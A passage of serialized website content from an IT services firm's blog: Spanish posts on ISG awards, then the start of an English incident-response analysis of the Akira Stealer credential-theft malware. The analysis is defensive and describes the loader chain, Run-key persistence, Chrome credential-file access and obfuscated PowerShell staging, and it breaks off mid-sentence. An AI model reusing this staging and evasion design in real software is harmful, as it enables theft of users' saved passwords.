consultoría Microsoft 365 Alemania, glueckkanja, servicios Microsoft glueckkanja, premio ISG Microsoft",[4401,4403],{"lang":2260,"href":4402},"/blog/corporate/2025/05/isg-germany-2025",{"lang":2257,"href":4404},"/blog/corporate/2025/05/isg-germany-2025-en",{"noMargin":2180},{"quote":2180,"infos":4407},{"bgColor":2200,"headline":4408,"subline":4409,"level":41,"textStyling":2203,"flush":2204,"person":4410,"form":4419},"Solicita el estudio","¿Quieres profundizar en los resultados del estudio? Escríbenos – te enviaremos el resumen completo de ISG con nuestras capacidades y fortalezas.",{"image":4411,"cloudinary":2180,"alt":2414,"name":2414,"quotee":2414,"quoteeTitle":4412,"quote":4413,"detailsHeader":4414,"details":4415},"/people/people-michael-breither.jpg","COO","Ser reconocidos una vez más por ISG confirma nuestro enfoque: servicios estandarizados y escalables para plataformas Microsoft – con un verdadero valor añadido para nuestros clientes.","¡Esperamos\u003Cbr />tu mensaje!",[4416,4418],{"text":2812,"href":2813,"details":4417,"icon":2815},"Llamar ahora",{"text":2806,"href":3258,"icon":2819},{"ctaText":2212,"cta":4420,"method":2168,"action":2215,"fields":4421},{"skin":2214},[4422,4423,4425,4426,4429,4431,4432,4434,4436,4437],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":4181},{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":4424},"Por favor, introduce el nombre de tu empresa.",{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":4186},{"label":4427,"type":2231,"id":2232,"required":2167,"requiredMsg":4428},"Tu mensaje","Por favor, escribe un mensaje.",{"label":4430,"type":2236,"id":2237,"required":2180,"requiredMsg":4192},"Tus datos se almacenarán y utilizarán para responder a tu solicitud. Más información en nuestra \u003Ca href=\"/es/privacidad\">Política de privacidad\u003C/a>.",{"type":2240,"id":2241,"value":2663},{"type":2240,"id":2243,"value":4433},"DE",{"type":2240,"id":2246,"value":4435},"Formulario: Blog ISG Alemania | ES",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"image":4439,"cloudinary":2180,"alt":4440,"bgColor":4441,"offset":2167,"list":4442,"left":2167,"float":2167,"firstColWidth":650,"secondColWidth":662,"copyClasses":4446,"headline":4447,"subline":4448,"spacing":4449},"/logos/isg-provider-lens-rising-star-ch.png","ISG Provider Lens","#fcd116",[4443],{"ctaText":4444,"ctaHref":4445,"ctaType":3068},"Más información","/es/blog/corporate/2025/05/isg-switzerland-2025","richtext","\u003Cp>Por cierto, ¡en Suiza somos Rising Star!\u003Cbr />¡Merci, ISG!\u003C/p>","\u003Cp>Consulta todos los resultados de ISG en Suiza.\u003C/p>","space-top-2 space-bottom-2","/posts/2025-05-08-isg-germany-2025",{"title":4294,"description":4300},"posts/2025-05-08-isg-germany-2025",[2719,4454],"ISG","2f79OgjbQalBj8VIHaw7Vb2G0hYOOYF64cN4POr-YII",{"id":4457,"title":4458,"author":4459,"body":4460,"cta":2165,"description":4464,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":4517,"moment":4394,"navigation":2180,"path":4561,"seo":4562,"stem":4563,"tags":4564,"webcast":2167,"__hash__":4565},"content_es/posts/2025-05-08-isg-switzerland-2025.md","Suiza se suma. glueckkanja se convierte en Rising Star de ISG",[2460],{"type":9,"value":4461,"toc":4512},[4462,4465,4468,4470,4472,4475,4479,4481,4487,4492,4496,4498,4504,4509],[12,4463,4464],{},"Berna es conocida por su impresionante casco antiguo, la Torre del Reloj, el Palacio Federal – y, por supuesto, el jardín de rosas. Ahora hay un nuevo motivo de orgullo: glueckkanja Suiza ha sido nombrado “Rising Star” en el último estudio ISG Provider Lens™, en reconocimiento a nuestros servicios de Microsoft 365 y Managed Services for Azure.",[12,4466,4467],{},"Desde 2024 tenemos presencia directa en Berna. Desde allí, como socio experimentado de Microsoft, ayudamos a empresas suizas a migrar a la nube – con estrategia, seguridad y una visión clara de lo posible. En apenas doce meses, hemos contribuido a reforzar la seguridad IT en el tejido empresarial suizo y hemos impulsado la innovación en múltiples sectores. Por eso, nos alegra aún más que nuestro trabajo sea reconocido por ISG.",[41,4469,4307],{"id":4306},[12,4471,31],{},[12,4473,4474],{},"El estudio “Microsoft Cloud Ecosystem” forma parte de la serie Provider Lens™ de ISG y ofrece análisis profundos que ayudan a las empresas a alinear su estrategia – desde el posicionamiento hasta las alianzas y estrategias de salida al mercado. Los proveedores se evalúan según su portfolio y competitividad dentro del ecosistema de Microsoft Cloud, y se posicionan en cuatro cuadrantes: Product Challenger, Contender, Market Challenger y Leader. Esa es la teoría – ahora vamos con nuestros resultados.",[41,4476,4478],{"id":4477},"glueckkanja-es-rising-star-en-microsoft-365-services","glueckkanja es Rising Star en Microsoft 365 Services",[12,4480,31],{},[12,4482,4483],{},[2772,4484],{"alt":4485,"src":4486},"Microsoft 365 Services","https://res.cloudinary.com/c4a8/image/upload/blog/pics/Microsoft_365_Services.png",[12,4488,4489],{},[4328,4490,4491],{},"\"glueckkanja apoya a las empresas suizas en su transformación cloud segura, integra Microsoft 365 y Windows 365, y optimiza los procesos IT mediante automatización y escalabilidad.\"",[41,4493,4495],{"id":4494},"glueckkanja-es-rising-star-en-managed-services-for-azure","glueckkanja es Rising Star en Managed Services for Azure",[12,4497,31],{},[12,4499,4500],{},[2772,4501],{"alt":4502,"src":4503},"Managed Services for Azure","https://res.cloudinary.com/c4a8/image/upload/v1746721421/blog/pics/Managed_Services_for_Azure.png",[12,4505,4506],{},[4328,4507,4508],{},"\"glueckkanja es un Rising Star en el mercado suizo de Managed Services para Azure. Con presencia local, rendimiento demostrado y visión tecnológica, la empresa potencia la seguridad, automatización y escalabilidad para estrategias cloud preparadas para el futuro.\"",[12,4510,4511],{},"Así que decimos “Merci vielmals” – y brindamos con un Bärner Müntschi. Si quieres conocer el estudio completo en detalle, estaremos encantados de enviártelo.",{"title":65,"searchDepth":111,"depth":111,"links":4513},[4514,4515,4516],{"id":4306,"depth":111,"text":4307},{"id":4477,"depth":111,"text":4478},{"id":4494,"depth":111,"text":4495},{"lang":2170,"seoTitle":4518,"titleClass":2172,"date":4394,"categories":4519,"blogtitlepic":4520,"socialimg":4521,"customExcerpt":4522,"keywords":4523,"hreflang":4524,"footer":4529,"contactInContent":4530,"textImageTeaser":4554},"glueckkanja Suiza nombrado 'Rising Star' por ISG 2025 en Microsoft 365 y Azure Services",[2663],"head-isg-ch-2025.png","/blog/heads/head-isg-ch-2025.png","glueckkanja Suiza ha sido nombrado 'Rising Star' por ISG en las categorías Microsoft 365 Services y Managed Services for Azure. Un reconocimiento que demuestra que nuestros estándares, nuestra ambición y nuestros servicios marcan la pauta – incluso más allá de las fronteras.","Microsoft Partner Suiza, Managed Services Azure Suiza, Microsoft 365 Services Suiza, proveedor IT Suiza, servicios Cloud Suiza, ISG Provider Lens Suiza, glueckkanja Suiza, Microsoft Cloud Suiza, Rising Star ISG 2025, seguridad informática Suiza, transformación digital Suiza, Azure Bern, consultoría Microsoft 365 Suiza, glueckkanja, glueckkanja Bern, servicios Microsoft glueckkanja",[4525,4527],{"lang":2260,"href":4526},"/blog/corporate/2025/05/isg-switzerland-2025",{"lang":2257,"href":4528},"/blog/corporate/2025/05/isg-switzerland-2025-en",{"noMargin":2180},{"quote":2180,"infos":4531},{"bgColor":2200,"headline":4408,"subline":4409,"level":41,"textStyling":2203,"flush":2204,"person":4532,"form":4539},{"image":4411,"cloudinary":2180,"alt":2414,"name":2414,"quotee":2414,"quoteeTitle":4412,"quote":4533,"detailsHeader":4414,"details":4534},"Ser nombrados Rising Star demuestra que nuestro enfoque también está dando resultados en Suiza: servicios Microsoft estandarizados y seguros – aplicados de forma pragmática y con verdadero valor añadido para nuestros clientes.",[4535,4538],{"text":4536,"href":4537,"details":4417,"icon":2815},"+41 31 5611900","tel:+41 31 5611900",{"text":2806,"href":3258,"icon":2819},{"ctaText":2212,"cta":4540,"method":2168,"action":2215,"fields":4541},{"skin":2214},[4542,4543,4544,4545,4546,4547,4548,4550,4552,4553],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":4181},{"label":2222,"type":61,"id":2223,"required":2180,"requiredMsg":4183},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":4186},{"label":4427,"type":2231,"id":2232,"required":2167,"requiredMsg":4428},{"label":4430,"type":2236,"id":2237,"required":2180,"requiredMsg":4192},{"type":2240,"id":2241,"value":2663},{"type":2240,"id":2243,"value":4549},"CH",{"type":2240,"id":2246,"value":4551},"Formulario: Blog ISG Suiza | ES",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},{"image":4555,"cloudinary":2180,"alt":4440,"bgColor":4441,"list":4556,"left":2167,"firstColWidth":650,"secondColWidth":662,"copyClasses":4446,"headline":4559,"subline":4560,"spacing":4449},"/logos/isg-provider-lens-leader-de.png",[4557],{"ctaText":4444,"ctaHref":4558,"ctaType":3068},"/es/blog/corporate/2025/05/isg-germany-2025","\u003Cp>Por cierto, en Alemania somos Líderes en Microsoft 365 y Managed Azure.\u003Cbr />¡Gracias, ISG!\u003C/p>","\u003Cp>Consulta todos los resultados de ISG en Alemania.\u003C/p>","/posts/2025-05-08-isg-switzerland-2025",{"title":4458,"description":4464},"posts/2025-05-08-isg-switzerland-2025",[2719,4454],"xzENbe94JRLEwbGYdUivSqq7MWYnX5_sP32WbZ8EhZ4",{"id":4567,"title":4568,"author":4569,"body":4570,"cta":2165,"description":31,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":16921,"moment":16923,"navigation":2180,"path":17015,"seo":17016,"stem":17017,"tags":17018,"webcast":2167,"__hash__":17021},"content_es/posts/2025-06-16-quiet-breach.md","Inside Akira Stealer: A full technical analysis of a modular stealer",[7],{"type":9,"value":4571,"toc":16776},[4572,4576,4578,4585,4588,4606,4609,4626,4632,4635,4638,4659,4667,4678,4685,4688,4691,4706,4713,4716,4719,4731,4735,4737,4743,4747,4749,4752,4764,4773,4779,4782,4788,4791,4795,4797,4802,4808,4811,4815,4817,4820,4846,4851,4856,4860,4862,4865,4869,4871,4874,4876,4882,4885,4889,4891,4901,4904,4907,4927,4930,4937,4944,4946,4952,4955,4961,4964,4998,5001,5010,5016,5025,5028,5039,5042,5049,5051,5060,5070,5102,5108,5113,5134,5140,5143,5146,5152,5160,5167,5169,5172,5184,5187,5220,5226,5253,5262,5265,5270,5279,5281,5290,5296,5313,5316,5321,5355,5359,5362,5365,5371,5385,5391,5397,5399,5404,5408,5410,5484,5487,5491,5493,5498,5504,5509,5518,5523,5528,5539,5542,5547,5556,5562,5565,5569,5571,5582,5587,5606,5612,5621,5632,5639,5644,5648,5650,5656,5682,5685,5696,5699,5708,5711,5715,5717,5725,5728,5731,5744,5754,5761,5782,5785,5791,5795,5797,5800,5809,5821,5846,5852,5858,5861,5868,5871,5884,5891,5893,5900,5904,5906,5912,6010,6017,6024,6026,6029,6052,6055,6082,6085,6128,6131,6140,6143,6160,6166,6169,6178,6181,6195,6202,6206,6208,6215,6238,6245,6279,6282,6297,6304,6309,6320,6323,6327,6329,6332,6347,6354,6365,6376,6411,6418,6421,6425,6427,6433,6438,6478,6481,6496,6499,6508,6514,6517,6521,6523,6526,6535,6538,6585,6592,6596,6598,6604,6609,6638,6645,6647,6663,6667,6669,6672,6711,6717,6723,6727,6729,6748,6758,6765,6797,6804,6850,6858,6862,6864,6867,6895,6905,6912,6914,6919,6923,6925,6931,6935,6937,6944,6970,6977,7232,7235,7240,7243,7275,7280,7284,7286,7289,7293,7295,7298,7400,7403,7407,7409,7412,7574,7577,7600,7604,7606,7615,7857,7860,7889,7893,7895,7928,7931,7934,7965,7969,7971,7977,7982,7985,8002,8005,8013,8018,8021,8100,8108,8111,8117,8125,8129,8131,8137,8142,8145,8162,8169,8174,8181,8243,8256,8261,8267,8294,8297,8335,8338,8343,8346,8360,8364,8366,8371,8391,8398,8404,8406,8410,8412,8418,8422,8424,8428,8430,8435,8462,8468,8472,8474,8480,8497,8523,8530,8534,8536,8539,8548,8562,8565,8569,8571,8584,8587,8596,8601,8608,8610,8614,8616,8625,8629,8631,8636,8650,8665,8669,8671,8751,8754,8761,8763,8768,8826,8833,8959,8962,9107,9111,9113,9116,9170,9173,9177,9179,9186,9239,9242,9246,9248,9251,9303,9306,9310,9312,9319,9371,9374,9378,9380,9387,9428,9431,9435,9437,9444,9526,9529,9533,9535,9538,9585,9588,9593,9596,9599,9603,9605,9610,9616,9621,9627,9632,9638,9643,9649,9654,10055,10059,10061,10102,10106,10108,10116,10120,10122,10132,10137,10162,10183,10188,10275,10279,10281,10374,10377,10383,10390,10392,10395,10450,10505,10512,10514,10517,10552,10587,10594,10596,10599,10632,10667,10674,10676,10679,10748,10794,10801,10803,10806,10834,10864,10871,10873,10876,10904,10927,10937,10939,10942,10967,11005,11009,11011,11044,11048,11050,11053,11056,11059,11062,11065,11070,11095,11100,11130,11136,11145,11167,11376,11380,11382,11389,11487,11490,11494,11496,11503,11596,11606,11612,11615,11620,11626,11654,11659,11689,11742,11761,11764,11769,11818,11822,11824,11827,11831,11833,11839,11959,11978,11982,11984,11989,12063,12084,12088,12090,12093,12096,12099,12102,12201,12209,12213,12215,12220,12255,12276,12280,12282,12285,12288,12296,12299,12387,12401,12405,12407,12410,12413,12506,12512,12514,12520,12524,12526,12529,12594,12611,12614,12648,12651,12655,12657,12662,12675,12720,12746,12751,12764,12840,12895,12899,12901,12904,12910,12950,12960,12966,12976,12980,12982,12985,13014,13040,13046,13050,13052,13059,13066,13068,13074,13129,13157,13161,13163,13166,13231,13238,13277,13281,13283,13289,13304,13307,13342,13346,13348,13355,13399,13413,13419,13426,13428,13431,13435,13437,13440,13474,13477,13502,13506,13508,13513,13516,13540,13564,13568,13570,13573,13597,13601,13603,13606,13626,13630,13632,13635,13642,13755,13760,13805,13809,13811,13817,13851,13905,13910,13913,13917,13919,13922,13926,13928,13931,13937,13941,13943,13946,14001,14016,14020,14022,14033,14102,14111,14116,14119,14163,14165,14169,14171,14174,14264,14269,14398,14402,14404,14407,14412,14485,14503,14508,14528,14536,14541,14547,14562,14579,14585,14643,14661,14666,14683,14688,14732,14746,14749,14753,14755,14760,14764,14766,14773,14780,14784,14786,14897,14904,14908,14910,14916,14921,15001,15008,15015,15019,15021,15024,15053,15060,15064,15066,15070,15072,15079,15082,15085,15088,15231,15234,15238,15240,15243,15247,15249,15252,15287,15293,15297,15299,15302,15328,15331,15337,15341,15343,15348,15365,15371,15375,15377,15381,15383,15399,15423,15430,15446,15465,15468,15472,15474,15485,15489,15491,15925,15928,15932,15934,15940,15943,15946,15952,15955,15966,15972,15975,15980,15984,15986,15989,15994,16008,16012,16014,16311,16314,16318,16320,16432,16435,16439,16441,16495,16498,16502,16504,16667,16670,16674,16676,16717,16720,16724,16726,16729,16732,16735,16738,16741,16744,16749,16753,16755,16758,16761,16764,16767,16770,16773],[25,4573,4575],{"id":4574},"prologue","Prologue",[12,4577,31],{},[12,4579,4580,4581,4584],{},"It started like so many modern attacks do: quietly. A low-confidence Defender alert — ",[251,4582,4583],{},"\"Suspicious sequence of exploration activities\""," — surfaced during onboarding phase of a new customer into our glueckkanja Cyber Security Operations Center (CSOC).",[12,4586,4587],{},"There were no signature hits. No malware classifications. No real-time protection response. Just a single behavioral correlation in Microsoft 365 Defender, buried in the noise — and yet, unmistakably wrong.",[12,4589,4590,4591,4594,4595,4598,4599,4602,4603],{},"While triaging the alert, one specific action caught my attention: ",[63,4592,4593],{},"python.exe"," had accessed both the ",[63,4596,4597],{},"Login Data"," and ",[63,4600,4601],{},"Web Data"," files inside a Chromium profile. Microsoft Defender immediately escalated this to a high-severity incident — ",[251,4604,4605],{},"\"Possible theft of passwords and other sensitive web browser information.\"",[12,4607,4608],{},"This wasn’t a false positive. It was the tip of something deeper.",[12,4610,4611,4612,4615,4616,4619,4620,4623,4624,1014],{},"Tracing the telemetry backwards, I uncovered a generic startup-located binary — ",[63,4613,4614],{},"Updater.exe"," — which spawned a NodeJS-based wrapper (",[63,4617,4618],{},"main.exe",") that executed a command line to run a script named ",[63,4621,4622],{},"astor.py"," via ",[63,4625,4593],{},[56,4627,4630],{"className":4628,"code":4629,"language":61,"meta":65},[59],"Updater.exe → main.exe → cmd.exe → python.exe Crypto\\Util\\astor.py\n",[63,4631,4629],{"__ignoreMap":65},[12,4633,4634],{},"The script didn’t just scrape credentials — it executed a sequence of post-compromise reconnaissance steps, including registry queries, system fingerprinting, and privilege-aware enumeration. It operated with surgical precision, mimicking native system behavior to evade detection. And it worked — almost.",[12,4636,4637],{},"At the time of first response:",[1255,4639,4640,4649,4656],{},[1258,4641,4642,4644,4645,4648],{},[63,4643,4614],{}," was flagged by only ",[251,4646,4647],{},"1 out of 69"," engines on VirusTotal.",[1258,4650,4651,805,4653,4655],{},[63,4652,4618],{},[63,4654,4622],{},", and all associated components were not really flagged on VirusTotal.",[1258,4657,4658],{},"No files were signed. No elevated context. Just \"ordinary\" processes doing very non-ordinary things.",[12,4660,4661,4663,4664,4666],{},[63,4662,4614],{}," didn’t touch credentials. That task was reserved for ",[63,4665,4622],{},", the in-memory Python payload — a file that, by design, left almost no trace.",[12,4668,4669,4670,4673,4674,4677],{},"Within ",[251,4671,4672],{},"21 minutes",", the affected system was isolated from the network. Within ",[251,4675,4676],{},"70 minutes",", credentials were rotated across all affected scopes: internal identities, SaaS platforms, third-party services.",[12,4679,4680,4681,4684],{},"But the real turning point came when we extracted and fully decrypted the Python payload. What we found was not a generic stealer — it was a custom deployment of ",[251,4682,4683],{},"Akira Stealer v2",", a commercially distributed malware family sold via Telegram.",[12,4686,4687],{},"Thanks to our in-house threat intelligence and reverse engineering capabilities, we were able to reconstruct the full functionality of the malware, extract all embedded indicators, and understand its staging, exfiltration, and credential targeting logic in detail.",[12,4689,4690],{},"More importantly — we didn’t stop at technical attribution. We went further.",[12,4692,4693,4694,4697,4698,4701,4702,4705],{},"We were able to provide the client with a ",[251,4695,4696],{},"complete dataset of exfiltrated credentials",": over ",[251,4699,4700],{},"100 unique username-password combinations",", including access credentials to cloud services, CRM systems, internal platforms, and even personal tools used by key employees. The theft had been ongoing for ",[251,4703,4704],{},"months"," — and we could account for all of it.",[12,4707,4708,4709,4712],{},"Using insights gained from this case, we built a ",[251,4710,4711],{},"post-infection analysis tool"," that scans affected systems, reconstructs credential access patterns, and generates detailed forensic reports — mapping exactly what was stolen, when, and from where.",[12,4714,4715],{},"We’ll share a glimpse of that scanner at the end of this report.",[12,4717,4718],{},"Because this is more than just an incident.\nThis is how we investigate. This is how we protect.",[12,4720,4721,4728,4730],{},[251,4722,4723,4724,1014],{},"Welcome to the ",[2630,4725,4727],{"href":4726},"/en/security/cloud-security-operations-center/","glueckkanja CSOC",[531,4729],{},"\nThis is how we work — because breaches don't wait.",[25,4732,4734],{"id":4733},"_1-initial-event-and-triage-summary","1. Initial Event and Triage Summary",[12,4736,31],{},[12,4738,4739,4740,4742],{},"On March 31, 2025, Microsoft Defender for Endpoint generated an alert labeled ",[251,4741,4583],{}," on a Windows 10 64-bit endpoint. I began the triage based on this signal and reviewed the affected system using the process tree, system timeline, and evidence correlated by Defender.",[41,4744,4746],{"id":4745},"_11-timeline-based-triage","1.1 Timeline-Based Triage",[12,4748,47],{},[12,4750,4751],{},"The alert pointed to a sequence of processes that warranted further inspection. During initial review, I observed the following access patterns to Chrome browser data within the local user profile:",[1255,4753,4754,4759],{},[1258,4755,4756],{},[63,4757,4758],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data",[1258,4760,4761],{},[63,4762,4763],{},"%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Web Data",[12,4765,4766,4767,4769,4770,4772],{},"These accesses were initiated by a process named ",[63,4768,4614],{},". While Microsoft Defender had not flagged the binary based on heuristic or behavioral analysis, I found a detection for ",[63,4771,4614],{}," on VirusTotal — flagged by a single engine at that point in time.",[12,4774,4775],{},[2772,4776],{"alt":4777,"src":4778},"Microsoft Defender","https://res.cloudinary.com/c4a8/image/upload/v1749797184/blog/pics/microsoft-defender.png",[12,4780,4781],{},"The full observed execution chain was as follows:",[56,4783,4786],{"className":4784,"code":4785,"language":61,"meta":65},[59],"winlogon.exe\n└── userinit.exe\n └── explorer.exe\n └── Updater.exe\n └── main.exe\n └── cmd.exe /d /s /c \"python.exe Crypto\\Util\\astor.py\"\n └── python.exe Crypto\\Util\\astor.py\n",[63,4787,4785],{"__ignoreMap":65},[12,4789,4790],{},"At this stage, no deeper static or dynamic analysis of the involved files had been performed. My focus was on understanding the high-level behavior and context. The process names and file paths were generic, and no suspicious command-line arguments were present beyond the chained Python execution.",[41,4792,4794],{"id":4793},"_12-initial-response","1.2 Initial Response",[12,4796,47],{},[12,4798,4669,4799,4801],{},[251,4800,4672],{}," of the initial alert, I initiated host isolation using Defender for Endpoint’s isolation features. The goal was to prevent potential further spread or exfiltration.",[12,4803,4804,4805,4807],{},"Within the first ",[251,4806,4676],{},", we proceeded to rotate credentials that were known to be used on the affected host — covering internal systems, SaaS platforms, and critical third-party vendors.",[12,4809,4810],{},"The reverse engineering process began after the first containment. The following sections document the technical deep dive that followed to investigate the breach.",[41,4812,4814],{"id":4813},"_13-response-summary-fast-transparent-impact-driven","1.3 Response Summary – Fast, Transparent, Impact-Driven",[12,4816,47],{},[12,4818,4819],{},"Our response combined speed, expertise, and operational excellence—backed by proven workflows and full visibility for the customer.",[1255,4821,4822,4828,4834,4840],{},[1258,4823,4824,4827],{},[251,4825,4826],{},"Detection to full containment in under 90 minutes","\nDefender alerts, network isolation, antivirus scan, and credential revocation executed rapidly and in concert.",[1258,4829,4830,4833],{},[251,4831,4832],{},"Deep-dive forensic response within 48 hours","\nIncluding full disk and memory analysis, browser artifact review, credential dumping detection, and behavioral reconstruction of attacker activity.",[1258,4835,4836,4839],{},[251,4837,4838],{},"Secure data recovery & evidence handling","\nThe stolen data—including cookies, passwords, tokens, and browser profiles—was recovered, forensically archived, and handed off securely to the customer.",[1258,4841,4842,4845],{},[251,4843,4844],{},"End-to-end visibility and communication","\nEvery step—from first alert to remediation and debrief—was fully documented, shared in real time, and summarized in a structured CSIRT handover.",[2109,4847,4848],{},[12,4849,4850],{},"This incident showcases how glueckkanja CSOC doesn’t just stop malware—we dismantle its effects, restore control to our customers, and turn every incident into insight.",[52,4852],{"className":4853},[4854,4855],"space-top-1","space-bottom-1",[25,4857,4859],{"id":4858},"_2-malware-architecture-and-execution-chain-overview","2. Malware Architecture and Execution Chain Overview",[12,4861,31],{},[12,4863,4864],{},"The malware observed on the affected endpoint followed a structured, multi-stage architecture with clear separation of responsibilities: deployment, decoding, execution, and data exfiltration.",[41,4866,4868],{"id":4867},"_21-execution-chain-overview","2.1 Execution Chain Overview",[12,4870,47],{},[12,4872,4873],{},"The observed execution flow was as follows:",[12,4875,4614],{},[56,4877,4880],{"className":4878,"code":4879,"language":61},[59],"​ └── main.exe\n​ └── cmd.exe\n​ └── python.exe astor.py\n",[63,4881,4879],{"__ignoreMap":65},[12,4883,4884],{},"Each component in the chain contributed to stealth, modularity, and evasion. The architecture leveraged legitimate runtimes and standard OS interpreters to bypass detection mechanisms.",[186,4886,4888],{"id":4887},"_211-origin-uncertainty-missing-initial-vector","2.1.1 Origin Uncertainty: Missing Initial Vector",[12,4890,192],{},[12,4892,4893,4894,4897,4898,1014],{},"Despite extensive analysis of the post-compromise environment, the initial access vector could not be conclusively determined. This uncertainty stems primarily from the fact that the malware had remained active for an estimated ",[251,4895,4896],{},"six months prior to detection"," — exceeding the ",[251,4899,4900],{},"log retention period enforced by Microsoft Defender for Endpoint",[12,4902,4903],{},"As a result, no telemetry or forensic artifacts were available from the original time of infection. No initial process creation events, file drops, or command-line entries related to the delivery stage were recoverable from Defender’s timeline or associated sensors.",[12,4905,4906],{},"Based on contextual indicators and OSINT sources, a likely infection vector may have involved:",[1255,4908,4909,4915,4921],{},[1258,4910,4911,4914],{},[251,4912,4913],{},"Trojanized installers"," of cracked or modded gaming software",[1258,4916,4917,4920],{},[251,4918,4919],{},"Fake utilities"," or \"performance boosters\" distributed via forums and third-party sites",[1258,4922,4923,4926],{},[251,4924,4925],{},"Malicious browser extensions"," targeting specific user interests (e.g., crypto-related tools or Discord enhancements)",[12,4928,4929],{},"However, these remain speculative.",[12,4931,4932,4933,4936],{},"No confirmed dropper, phishing email, or compromised website could be identified during the investigation. While the malware architecture and execution chain were fully reconstructed, the ",[251,4934,4935],{},"initial point of compromise (MITRE ATT&CK T1190 / T1566)"," could not be validated.",[186,4938,4940,4941,4943],{"id":4939},"_212-updaterexe-initial-loader","2.1.2 ",[63,4942,4614],{}," – Initial Loader",[12,4945,192],{},[12,4947,4948,4949,4951],{},"When reviewing the process tree in Microsoft 365 Defender, ",[63,4950,4614],{}," stood out immediately — not because of what it did, but because of how silently it embedded itself into the system’s execution flow.",[12,4953,4954],{},"This binary was registered for automatic execution via the standard Windows Run key:",[56,4956,4959],{"className":4957,"code":4958,"language":61},[59],"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n",[63,4960,4958],{"__ignoreMap":65},[12,4962,4963],{},"That meant it would launch every time the user logged into their session — a classic persistence mechanism that requires no elevated privileges and often slips through unnoticed in EDR telemetry.",[1255,4965,4966,4972,4978,4984,4990],{},[1258,4967,4968,4971],{},[251,4969,4970],{},"File Type",": Windows PE executable (32-bit)",[1258,4973,4974,4977],{},[251,4975,4976],{},"Signature",": Unsigned",[1258,4979,4980,4983],{},[251,4981,4982],{},"VirusTotal Detection",": 1 out of 69 engines at the time of triage",[1258,4985,4986,4989],{},[251,4987,4988],{},"Execution Context",": Medium integrity, user session",[1258,4991,4992,1062,4995],{},[251,4993,4994],{},"Location",[63,4996,4997],{},"AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\",[12,4999,5000],{},"The file itself was small, cleanly compiled, and unremarkable from a static analysis standpoint. No suspicious strings, no encrypted sections, and no indicators of obfuscation or packing. It imported only a minimal set of standard Windows API functions and contained no embedded payload.",[12,5002,5003,5004,5006,5007,5009],{},"However, its behavior was more telling. Once launched, ",[63,5005,4614],{}," extracted an Electron application from a bundled archive — a self-contained NodeJS runtime packaged using standard Electron tooling. This unpacked folder contained an executable named ",[63,5008,4618],{},", which was subsequently launched as a child process.",[56,5011,5014],{"className":5012,"code":5013,"language":61,"meta":65},[59],"Updater.exe → main.exe\n",[63,5015,5013],{"__ignoreMap":65},[12,5017,5018,5019,5021,5022,5024],{},"There were no network indicators at this stage, no process injection, and no anomaly in privileges or token elevation. The entire role of ",[63,5020,4614],{}," appeared to be that of a loader — delivering a second-stage component (",[63,5023,4618],{},") into the environment, likely with the goal of maintaining stealth and modularity.",[12,5026,5027],{},"This kind of architectural separation is common in modern commodity malware and stealer toolkits. The initial loader acts merely as a deployment stub, allowing the heavier logic — often obfuscated, interpreted, or dynamically generated — to be contained in later stages.",[12,5029,5030,5031,5033,5034,5036,5037,1014],{},"In this case, ",[63,5032,4614],{}," served precisely that purpose: a quiet initial foothold designed to blend in, remain undetected, and pave the way for the execution of the actual stealer logic in ",[63,5035,4618],{}," and eventually ",[63,5038,4622],{},[12,5040,5041],{},"It didn’t touch the file system beyond its own directory and didn’t trigger any behavioral rules — and yet, it was the first domino in a long and carefully constructed attack chain.",[186,5043,5045,5046,5048],{"id":5044},"_213-mainexe-obfuscated-nodejs-payload-container","2.1.3 ",[63,5047,4618],{}," – Obfuscated NodeJS Payload Container",[12,5050,192],{},[12,5052,5053,5054,5056,5057,5059],{},"Following the execution of ",[63,5055,4614],{},", a second-stage binary named ",[63,5058,4618],{}," was launched. This component presented itself as a standard Electron application — a runtime environment bundling Node.js and Chromium, often used for cross-platform desktop apps. Its innocuous nature is part of what makes it so dangerous in the wrong hands.",[12,5061,5062,5063,5065,5066,5069],{},"Upon inspection, ",[63,5064,4618],{}," contained an internal archive named ",[63,5067,5068],{},"app.asar"," — the standard packaging format for Electron-based applications. Unlike legitimate Electron apps, however, the contents of this archive were anything but ordinary.",[1255,5071,5072,5078,5084,5092],{},[1258,5073,5074,5077],{},[251,5075,5076],{},"Platform",": Electron (Node.js + Chromium)",[1258,5079,5080,5083],{},[251,5081,5082],{},"Architecture",": 64-bit Windows",[1258,5085,5086,5089,5090],{},[251,5087,5088],{},"Content Structure",": Embedded JavaScript files within ",[63,5091,5068],{},[1258,5093,5094,5097,5098,5101],{},[251,5095,5096],{},"Obfuscation Level",": High — achieved through ",[63,5099,5100],{},"js-confuser",", a commercially available obfuscation toolkit for JavaScript",[12,5103,5104,5105,5107],{},"Once decompiled and deobfuscated, the core logic of ",[63,5106,4618],{}," became evident. Its purpose was not to present a GUI or execute any frontend logic — instead, it acted as a hidden execution orchestrator.",[12,5109,5110],{},[251,5111,5112],{},"Observed Behavior:",[1255,5114,5115,5118,5125],{},[1258,5116,5117],{},"Decrypts and reconstructs a Base64-encoded PowerShell command stored within the JavaScript payload",[1258,5119,5120,5121,5124],{},"Spawns ",[63,5122,5123],{},"cmd.exe"," to execute the PowerShell command inline",[1258,5126,5127,5128,5130,5131,1289],{},"The PowerShell command in turn invokes ",[63,5129,4593],{},", passing in a script located under a seemingly benign directory structure (",[63,5132,5133],{},"Crypto\\Util\\astor.py",[56,5135,5138],{"className":5136,"code":5137,"language":61,"meta":65},[59],"main.exe → cmd.exe /d /s /c powershell → python.exe Crypto\\Util\\astor.py\n",[63,5139,5137],{"__ignoreMap":65},[12,5141,5142],{},"This chaining allowed the attacker to shift execution contexts and evade straightforward detection. Because the payload was obfuscated and staged in-memory, traditional signature-based controls were ineffective.",[12,5144,5145],{},"The Electron framework provided an ideal cover — allowing execution of arbitrary JavaScript while avoiding scrutiny. JavaScript-based execution also introduced cross-platform compatibility, allowing 